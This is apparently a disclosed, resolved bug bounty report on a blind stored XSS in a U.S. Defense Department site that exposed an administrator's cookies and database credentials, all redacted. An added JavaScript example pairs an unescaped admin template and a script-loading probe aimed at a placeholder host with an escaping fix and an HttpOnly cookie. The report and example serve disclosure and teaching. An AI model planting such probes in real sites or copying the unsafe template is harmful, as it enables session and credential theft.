Blind Stored XSS Payload fired at the backend on https://█████████/
Critical
U.S. Dept Of Defense
Reported by
nagli
Vulnerability Details
Technical details and impact analysis
**Summary:**
I have just gotten an email notification from my XSSHunter payload that my blind stored XSS has been triggered by an administrator on the █████████ site, in the following URL:
```
https://█████/████
```
Admin IP address:
████████
User-Agent:
█████████
Cookies:
```
██████
```
Injection Image:
███████
DB Creds exposed:
██████████.█████\█████a
## Suggested Mitigation/Remediation Actions
Sanitizing the input on the back-end as well
## Best Regards
nagli
## Impact
Ability to capture administrator actions when performing activities on the back-end.
Extraction of DB credentials.
Access to private information.
Stealing the cookies of the administrator.
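The report above describes a stored payload that only fired later, when an administrator's back-end page rendered it, and the reporter's suggested remedy is to sanitize on the back-end. The example below is added here and is not code from the report or from the affected site: it shows a minimal admin template that interpolates a stored record into HTML unescaped (the pattern a blind stored XSS relies on) beside the same template with contextual HTML encoding at render time, plus a session-cookie header with `HttpOnly` set as the defence-in-depth layer against the cookie theft listed under Impact. The stored probe string, the `example.invalid` callback host, and the record shape are constructed for the example.

```javascript
// Added example (not part of the original report): a record stored from an
// untrusted form is later rendered into an administrator's back-end page.
// Blind XSS works precisely because the attacker never sees this page; the
// payload sits in the database until an admin view concatenates it into markup.

// Constructed sample: a blind-XSS probe in the style of a callback-based
// payload. The host is a placeholder, not a real collection endpoint.
const STORED_FIELD = '"><script src="https://example.invalid/probe.js"></script>';

// Vulnerable: raw interpolation into an HTML attribute and an element body.
// Whatever was stored is handed to the admin's browser as live markup.
function renderAdminRowUnsafe(record) {
  return `<tr><td title="${record.name}">${record.name}</td></tr>`;
}

// Encode the five characters that change meaning in HTML text and in
// quoted attribute values. This is output encoding, applied at the sink,
// so it does not depend on guessing at input time where the value will land.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same template with contextual output encoding. The stored
// string is still shown to the admin, but as inert text.
function renderAdminRowSafe(record) {
  const safe = escapeHtml(record.name);
  return `<tr><td title="${safe}">${safe}</td></tr>`;
}

// Crude check used only to illustrate the difference between the two
// renderings: would the browser's parser see a script element here?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the "stealing the cookies of the administrator" impact:
// an HttpOnly session cookie is not readable via document.cookie even when a
// payload does execute. It does not stop the XSS itself, only cookie exfiltration.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Render the constructed record both ways so the outputs can be compared.
function demo() {
  const record = { name: STORED_FIELD };
  return {
    unsafe: renderAdminRowUnsafe(record),
    safe: renderAdminRowSafe(record),
    cookie: sessionCookieHeader('s3ss10n-1d'),
  };
}

console.log(demo());
```

The unsafe rendering closes the `title` attribute with the stored `">` and emits a live `<script src=...>`; the safe rendering contains `&lt;script` and stays text in both the attribute and the cell. Validation at input time is still worth doing, but because a blind payload can surface in any later view (admin panels, e-mail templates, PDF exports), encoding at each output sink is what actually removes the bug.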
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Stored